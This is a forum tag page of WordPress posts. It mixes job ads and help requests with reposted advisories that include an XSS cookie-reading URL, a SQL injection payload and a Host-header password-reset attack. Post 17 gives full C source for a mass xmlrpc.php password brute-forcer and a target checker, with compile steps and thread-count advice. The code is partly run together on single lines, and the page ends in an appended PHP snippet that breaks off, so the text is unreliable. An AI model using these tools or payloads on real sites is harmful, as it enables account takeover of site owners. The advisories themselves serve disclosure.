Showing results for tags 'wordpress'.

  1. Due to lack of time, I will no longer be working on desktop applications. I build small and medium-sized websites, scripts, pages, bug fixes, optimizations. I write clean, commented code. UPDATE: After seeing dozens of scripts/pages made by one person or another, I can say that I write calligraphically! For complete websites I can also take care of hosting and server configuration so that the site is delivered "turnkey". I also offer maintenance where needed. Backend: PHP + MySQL. Frontend: HTML + CSS + jQuery / Bootstrap. Payment methods: PayPal or bank transfer. Payment: on completion of the project or in installments, case by case. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
  2. If you need to change the domain of a WordPress site or change the protocol (from http to https), you have to update all the links present in the database, both those in posts and those in options. The operation is very simple and you only need MySQL access. You can use either the CLI or phpMyAdmin. Example:

     update wp_options set option_value = replace(option_value, 'http://rstforums.com', 'https://rstforums.com') WHERE option_name = 'home' OR option_name = 'siteurl';
     update wp_posts set guid = replace(guid, 'http://rstforums.com', 'https://rstforums.com');
     update wp_posts set post_content = replace(post_content, 'http://rstforums.com', 'https://rstforums.com');
     update wp_postmeta set meta_value = replace(meta_value, 'http://rstforums.com', 'https://rstforums.com');

     Notes:
     - In the example above the old domain is rstforums.com on http and the new domain is rstforums.com on https.
     - The example also applies if you change the domain name, not just the protocol.
     - Do not add the trailing slash after the domain name.
     - 'wp_' in the table names is the prefix. WordPress may be installed with a different prefix. You can see the prefix in the "wp-config.php" configuration file under "$table_prefix", or directly in MySQL.
  3. Advanced knowledge of PHP/MySQL, HTML/CSS/JS (jQuery), JavaScript; intermediate English; experience in e-commerce projects (WordPress WooCommerce, OpenCart, PrestaShop, Magento), API implementation. You will work on e-commerce projects. We are looking for proactive people who solve problems all the way through, and who have the desire and ability to create their own structures and implement their own vision for solving a task.
  4. I own a site built on the WP platform. It has a good niche; the domain and the content are well targeted. I'm not a specialist, not a pro programmer.... PS. I've had the site for 3 years, I've kept modifying it,.... My question: I'd like to grow it! How do I go about it? At SEO I'm a zero! Can someone explain to me where to start?
  5. Looking for someone with WordPress knowledge to modify a theme for a fee, PM me with your Skype address.
  6. WordPress User Login History plugin version 1.5.2 suffers from a cross site scripting vulnerability.

     Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/
     Vendor: Er Faiyaz Alam
     Tested version: 1.5.2
     CVE ID: CVE-2017-15867

     ** CVE description **
     Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.

     ** Technical details **
     The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the "> (%22%3E) expression and inject arbitrary HTML/JavaScript code.

     Example of the vulnerable code with the date_from parameter (line 21):

     <td><input readonly="readonly" autocomplete="off" placeholder="<?php _e("From", "user-login-history") ?>" id="date_from" name="date_from" value="<?php echo isset($_GET['date_from']) ? $_GET['date_from'] : "" ?>" class="textfield-bg"></td>

     ** Proof of Concept **
     Example using the user_id parameter:
     http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

     ** Solution **
     Update to version 1.6.

     ** Timeline **
     15/10/2017: vendor contacted
     15/10/2017: vendor acknowledgment
     18/10/2017: fix pushed to GitHub
     30/10/2017: fixed release available on WordPress Plugins Store.

     ** Credits **
     Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).
     ** References **
     - WordPress-plugin-user-login-history GitHub : error log and xss and some minor improvements
       https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741

     -- Best Regards, Nicolas Buzy-Debat, Orange Cyberdefense Singapore (CERT-LEXSI)

     # 0day.today [2017-11-01] # Source: 0day.today
  7. ====================================================
     - Discovered by: Dawid Golunski (@dawid_golunski)
     - dawid[at]legalhackers.com
     - https://legalhackers.com
     - ExploitBox.io (@Exploit_Box)
     - CVE-2017-8295
     - Release date: 03.05.2017
     - Revision 1.0
     - Severity: Medium/High
     =============================================

     I. VULNERABILITY
     -------------------------
     WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day)

     II. BACKGROUND
     -------------------------
     "WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites."
     https://en.wikipedia.org/wiki/WordPress

     III. INTRODUCTION
     -------------------------
     Wordpress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such an attack could lead to an attacker gaining unauthorised access to a victim's WordPress account.

     IV. DESCRIPTION
     -------------------------
     The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner's account. This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function:

     ------[ wp-includes/pluggable.php ]------
     ...
     if ( !isset( $from_email ) ) {
         // Get the site domain and get rid of www.
         $sitename = strtolower( $_SERVER['SERVER_NAME'] );
         if ( substr( $sitename, 0, 4 ) == 'www.' ) {
             $sitename = substr( $sitename, 4 );
         }
         $from_email = 'wordpress@' . $sitename;
     }
     ...
     -----------------------------------------

     As we can see, Wordpress is using the SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email. However, major web servers such as Apache by default set the SERVER_NAME variable using the hostname supplied by the client (within the HTTP_HOST header):
     https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

     Because SERVER_NAME can be modified, an attacker could set it to an arbitrary domain of his choice, e.g.: attackers-mxserver.com, which would result in Wordpress setting the $from_email to wordpress@attackers-mxserver.com and thus result in an outgoing email with From/Return-Path set to this malicious address.

     As to which e-mail header the attacker would be able to modify - From or Return-Path, it depends on the server environment. As can be read on http://php.net/manual/en/function.mail.php, the From header also sets Return-Path under Windows.

     Depending on the configuration of the mail server, it may result in an email that gets sent to the victim WordPress user with such a malicious From/Return-Path address set in the email headers. This could possibly allow the attacker to intercept the email containing the password reset link, in some cases requiring user interaction as well as without user interaction. Some example scenarios include:

     * If the attacker knows the email address of the victim user, they can perform a prior DoS attack on the victim's email account (e.g. by sending multiple large files to exceed the user's disk quota, or attacking the DNS server) in order to cause the password reset email to be rejected by the receiving server, or not reach the destination and thus get returned to the account on the attacker's server.
     * Some autoresponders might attach a copy of the email sent in the body of the auto-replied message.
     * Sending multiple password reset emails to force the user to reply to the message to enquire for an explanation for the endless password reset emails. The reply containing the password link would then be sent to the attacker.
     etc.

     V. PROOF OF CONCEPT
     -------------------------
     If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost):

     -----[ HTTP Request ]----
     POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
     Host: injected-attackers-mxserver.com
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 56

     user_login=admin&redirect_to=&wp-submit=Get+New+Password
     ------------------------

     Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of the attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper:

     ------[ resulting e-mail ]-----
     Subject: [CompanyX WP] Password Reset
     Return-Path: <wordpress@attackers-mxserver.com>
     From: WordPress <wordpress@attackers-mxserver.com>
     Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
     X-Priority: 3
     MIME-Version: 1.0
     Content-Type: text/plain; charset=UTF-8
     Content-Transfer-Encoding: 8bit

     Someone requested that the password be reset for the following account:
     http://companyX-wp/wp/wordpress/
     Username: admin
     If this was a mistake, just ignore this email and nothing will happen.
     To reset your password, visit the following address:
     <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
     -------------------------------

     As we can see, the fields Return-Path, From, and Message-ID all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of:

     #!/bin/bash
     cat > /tmp/outgoing-email

     VI. BUSINESS IMPACT
     -------------------------
     Upon successful exploitation, the attacker may be able to reset a user's password and gain unauthorized access to their WordPress account.

     VII. SYSTEMS AFFECTED
     -------------------------
     All WordPress versions up to the latest 4.7.4

     VIII. SOLUTION
     -------------------------
     No official solution available. As a temporary solution users can enable UseCanonicalName to enforce a static SERVER_NAME value:
     https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

     This issue was first reported to the WordPress security team multiple times, with the first report sent in July 2016. As there has been no progress in this case, this advisory is finally released to the public without an official patch.

     IX. REFERENCES
     -------------------------
     https://legalhackers.com
     https://ExploitBox.io
     Vendor site: https://wordpress.org
     http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
     http://php.net/manual/en/function.mail.php
     https://tools.ietf.org/html/rfc5321

     X. CREDITS
     -------------------------
     Discovered by Dawid Golunski
     dawid (at) legalhackers (dot) com
     https://legalhackers.com
     https://ExploitBox.io
     Thanks to BeyondSecurity for help with contacting the vendor.

     XI. REVISION HISTORY
     -------------------------
     03.05.2017 - Advisory released, rev. 1

     XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS
     -------------------------
     ExploitBox.io is coming soon. Subscribe at https://ExploitBox.io to stay updated and be there for the launch.

     XIII. LEGAL NOTICES
     -------------------------
     The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
  8. CODE:
     # # # # #
     # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
     # Google Dork: N/A
     # Date: 09.03.2017
     # Vendor Homepage: https://www.apptha.com/
     # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
     # Demo: http://www.apptha.com/demo/pica-photo-gallery
     # Version: 1.0
     # Tested on: Win7 x64, Kali Linux x64
     # # # # #
     # Exploit Author: Ihsan Sencan
     # Author Web: http://ihsan.net
     # Author Mail : ihsan[@]ihsan[.]net
     # # # # #
     # SQL Injection/Exploit :
     # http://localhost/[PATH]/?aid=[SQL]
     # For example;
     # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
     # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
     # Etc..
     # # # # #

     Source: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
  9. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability.

     CODE:
     ------------------------------------------------------------------------
     WordPress audio playlist functionality is affected by Cross-Site Scripting
     ------------------------------------------------------------------------
     Yorick Koster, July 2016
     ------------------------------------------------------------------------
     Abstract
     ------------------------------------------------------------------------
     Two Cross-Site Scripting vulnerabilities exist in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded, the issues can be triggered by a Contributor or higher using the playlist shortcode.
     ------------------------------------------------------------------------
     OVE ID
     ------------------------------------------------------------------------
     OVE-20160717-0003
     ------------------------------------------------------------------------
     Tested versions
     ------------------------------------------------------------------------
     This issue was successfully tested on WordPress version 4.5.3.
     ------------------------------------------------------------------------
     Fix
     ------------------------------------------------------------------------
     These issues are resolved in WordPress version 4.7.3.
     ------------------------------------------------------------------------
     Details
     ------------------------------------------------------------------------
     https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html

     It was discovered that meta information (ID3) stored in audio files is not properly sanitized in case it is uploaded by a user with the unfiltered_html capability (generally an Editor or Administrator).

     The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting.

     The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render an audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability.

     Proof of concept
     The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3
     1) Upload the MP3 file to the Media Library (as Editor or Administrator).
     2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist).
     ------------------------------------------------------------------------
     Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.

     Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  10. Hi folks, I want to get a domain and hosting from freehostingeu.com and I'd like to find out whether I can somehow redirect the traffic from my WordPress blog to the new domain?! Thanks!
  11. Hi, can you recommend a web player for WordPress that takes links from YouTube and plays them one after another... something like a live TV channel, if you get what I mean... I know you can make a playlist on YouTube and embed the link, but I don't want the viewer to be able to choose what they want and browse through the content. For any other details you need, just ask me. Thanks in advance!
  12. Hello. I see many nice hosting themes for the WordPress platform. Currently I use WHMCS, but I'd like to ask: which plugin is needed for WordPress to do something similar to WHMCS (placing orders, support tickets, etc.)? I assume it's possible, since there are hundreds of hosting-oriented themes for WP.
  13. Hi, I have a WP plugin that I'd like to modify/update; I'm looking for someone capable of handling development on the WordPress/WooCommerce side. cx.dany [@] yahoo.com Thanks.
  14. I'm giving away the following from themeforest.net for free. They were purchased by me, so I reserve the right to give them only to certain people with seniority on RST (who won't do anything shady with them).

      Easy PHP Contact Form Script - PHP Scripts - Easy PHP Contact Form Script | CodeCanyon
      HTML5 Music Player for WordPress with 3 Skins - WordPress - HTML5 Music Player for WordPress with 3 Skins | CodeCanyon
      Nuvellen: Blog/Portfolio WordPress Theme - WordPress - Núvellen: Blog / Portfolio WordPress Theme | ThemeForest
      King Size - Fullscreen Background WordPress Theme - WordPress - King Size - Fullscreen Background WordPress Theme | ThemeForest
      Grid Powerpoint - Grid Powerpoint | GraphicRiver
      John Doe's Blog - Clean WordPress blog theme - http://themeforest.net/item/john-does-blog-clean-wordpress-blog-theme-/6603795
      X The Theme (WordPress) - http://themeforest.net/item/x-the-theme/5871901
      Genesis - Responsive Moodle Theme - http://themeforest.net/item/genesis-responsive-moodle-theme/5457547
      Saga - Responsive Moodle Theme - http://themeforest.net/item/saga-responsive-moodle-theme/5669197

      Total value 323 USD
  15. A tutorial from udemy.com for beginners, it's free. As you can see, it's about how to set up your host and install WordPress. (Sorry if I didn't post in the right place, it's my first post, I hope it won't be the last.) All the best to everyone. Web Hosting Set Up and WordPress Installation For Beginners
  16. Hi, I have a problem I've been struggling to solve for 2 days. I made an online movie site (for now it's local) and when I post a movie, the whole content of the post shows up on the page. I want it to show the movie's name with the picture, and when you click it, to take you to the full post where the movie itself is. How it looks for me: hosting immagini How I want it to look: free image hosting Thank you!
  17. I've seen a lot of brute-forcers for WordPress, but most of them target wp-login.php, so I decided to make one for xmlrpc.php.
      ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno ==
EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; 
time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } 
              strcat(tmpass, tmp);
              strcpy(pass2, tmpass);
            } else {
              /* alternative form: prepend the target host to the password suffix */
              char tmp[128], tmpass[128];
              int ivar, jvar = 0;
              for (ivar = 0; ivar < strlen(ip2); ivar++) {
                tmp[jvar] = ip2[ivar];
                tmp[jvar+1] = '\0';
                jvar++;
              }
              strcpy(tmpass, tmp);
              strcpy(tmp, "");
              jvar = 0;
              for (ivar = 7; ivar < strlen(pass2); ivar++) {
                tmp[jvar] = pass2[ivar];
                tmp[jvar+1] = '\0';
                jvar++;
              }
              strcat(tmpass, tmp);
              strcpy(pass2, tmpass);
            }
          }
          /* skip hosts already marked as done, one child per login attempt */
          if (!strstr(processed, ip)) {
            if (!(fork())) {
              getvuln(ip, user, pass2, outfile, link);
              exit(0);
            } else {
              numforks++;
              if (numforks > atoi(argv[4]))
                for (; numforks > atoi(argv[4]); numforks--)
                  wait(NULL);
            }
          }
        }
      }
      fclose(ipfile);
    }
  }
  fclose(passfile);
  }
  }
  fclose(userfile);
  printf("[*] Completed in: %lu secs\n", (unsigned long)(time(0) - start));
  exit(EXIT_SUCCESS);
}

===== checker.c =====

#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <time.h>      /* time(); was missing and only implicitly declared */

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *link, FILE *outfile);

FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

void usage(char *s) {
  printf(RED"ELITE SMTP BruteF0rce");
  printf(GREEN"\n"GREEN);
  printf("Smoke w33d everyday;)\n"NORMAL);
  printf("Usage: %s <IPs file> <threads>\n", s);
  exit(EXIT_SUCCESS);
}

/* Runs in a forked child. Connects to port 80 (non-blocking connect with a
   4 second timeout), POSTs a wp.getUsersBlogs XML-RPC call with a dummy
   password and logs the host when the reply carries faultCode 403
   ("Incorrect username or password"), i.e. xmlrpc.php is reachable and
   answers authentication attempts. */
int getvuln(char *victim, char *link, FILE *outfile) {
  int sockfd, n, valopt;
  struct sockaddr_in serv_addr;
  struct timeval timeout, tread;
  long arg;
  fd_set myset;
  socklen_t lon;
  char buffer[2048], postvar[2048], clen[256];

  struct hostent *hl = gethostbyname(victim);
  if (!hl) exit(0);

  timeout.tv_sec = 4;  timeout.tv_usec = 0;   /* connect timeout */
  tread.tv_sec = 10;   tread.tv_usec = 0;     /* read/write timeout */

  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  if (sockfd < 0) { perror("ERROR opening socket"); exit(1); }
  arg = fcntl(sockfd, F_GETFL, NULL);
  arg |= O_NONBLOCK;
  fcntl(sockfd, F_SETFL, arg);
  if (setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0)
    perror("setsockopt failed");
  if (setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0)
    perror("setsockopt failed");

  bzero(&serv_addr, sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  memcpy(&serv_addr.sin_addr, hl->h_addr, hl->h_length);
  serv_addr.sin_port = htons(80);

  if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
    if (errno == EINPROGRESS) {
      FD_ZERO(&myset);
      FD_SET(sockfd, &myset);
      if (select(sockfd + 1, NULL, &myset, NULL, &timeout) > 0) {
        lon = sizeof(int);
        getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void *)(&valopt), &lon);
        if (valopt) exit(0);        /* connect failed */
      } else {
        exit(0);                    /* connect timed out */
      }
    } else {
      exit(0);
    }
  }
  /* connected: back to blocking mode for the request/response */
  arg = fcntl(sockfd, F_GETFL, NULL);
  arg &= (~O_NONBLOCK);
  fcntl(sockfd, F_SETFL, arg);

  strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
  strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55");
  strcat(postvar, "</string></value></param></params></methodCall>");
  sprintf(clen, "%d", (int)strlen(postvar));

  bzero(buffer, 2048);
  strcpy(buffer, "POST ");
  strcat(buffer, link);
  strcat(buffer, " HTTP/1.1\r\n");
  strcat(buffer, "Host: ");
  strcat(buffer, victim);
  strcat(buffer, "\r\nConnection: keep-alive\r\n");
  strcat(buffer, "Content-Length: ");
  strcat(buffer, clen);
  strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
  strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
  strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
  strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
  strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
  strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
  strcat(buffer, "\r\n\r\n");
  strcat(buffer, postvar);
  strcat(buffer, "\r\n\r\n");

  n = write(sockfd, buffer, strlen(buffer));
  if (n < 0) exit(1);
  bzero(buffer, 2048);
  n = read(sockfd, buffer, 2047);
  if (n < 0) exit(1);

  /* faultCode 403 = WordPress checked the credentials and rejected them */
  if (strstr(buffer, "<int>403</int>")) {
    printf("[+]Found: %s - %s\n", victim, link);
    fprintf(outfile, "%s %s\n", victim, link);
  }
  close(sockfd);
  return 0;
}

int main(int argc, char *argv[]) {
  char ip[1024];
  size_t len;
  time_t start;

  if (argc < 3) usage(argv[0]);   /* both the list and the thread count are used below */
  outfile = fopen("out.log", "a+");
  printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]);
  start = time(0);

  if (!(ipfile = fopen(argv[1], "r"))) {
    printf("INVALID DOMAINS FILE: %s\n", argv[1]);
    exit(0);
  }
  while (1) {
    if (!fgets(ip, sizeof(ip), ipfile)) break;
    len = strlen(ip);
    if (len && ip[len-1] == '\n') ip[len-1] = '\0';

    /* try /xmlrpc.php and /blog/xmlrpc.php, each in its own child,
       never more than <threads> children alive at once */
    if (!(fork())) {
      getvuln(ip, "/xmlrpc.php", outfile);
      exit(0);
    } else {
      numforks++;
      if (numforks > atoi(argv[2]))
        for (; numforks > atoi(argv[2]); numforks--)
          wait(NULL);
    }
    if (!(fork())) {
      getvuln(ip, "/blog/xmlrpc.php", outfile);
      exit(0);
    } else {
      numforks++;
      if (numforks > atoi(argv[2]))
        for (; numforks > atoi(argv[2]); numforks--)
          wait(NULL);
    }
  }
  fclose(ipfile);
  printf("[*] Completed in: %lu secs\n", (unsigned long)(time(0) - start));
  exit(EXIT_SUCCESS);
}

To compile:
gcc -o checker checker.c
gcc -o brute brute.c

Use checker on a list of domains or IPs to see which of them accept authentication through xmlrpc.php. It will create an out.log file.
Usage: ./checker <IPs file> <threads>

To start brute, make a list of users and one of passwords and run:
./brute out.log users.txt passwords.txt <threads>

I have tried up to 1000 threads and it works ok, but to be safe use 300-400.
Suggestions welcome
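The request/response exchange the checker above relies on, as an added example that is not part of the post: it builds the same wp.getUsersBlogs call and parses the XML-RPC reply by faultCode instead of substring-matching `<int>403</int>`, which also tells a 405 (XML-RPC disabled) and a successful login apart from a rejected one. The fault codes and strings are WordPress's own (403 "Incorrect username or password.", 405 "XML-RPC services are disabled on this site."); the sample replies are constructed here and the classification labels are mine.

```php
<?php
// Added example, not code from the post above. Builds the wp.getUsersBlogs
// request the checker sends and classifies the XML-RPC reply by faultCode
// instead of grepping for "<int>403</int>".
//   403        -> WordPress checked the credentials: xmlrpc.php accepts logins
//   405        -> XML-RPC services are disabled on this site
//   no <fault> -> the credentials were accepted (blog list returned)

function build_get_users_blogs(string $user, string $pass): string
{
    // escape so a password containing < or & cannot break the XML document
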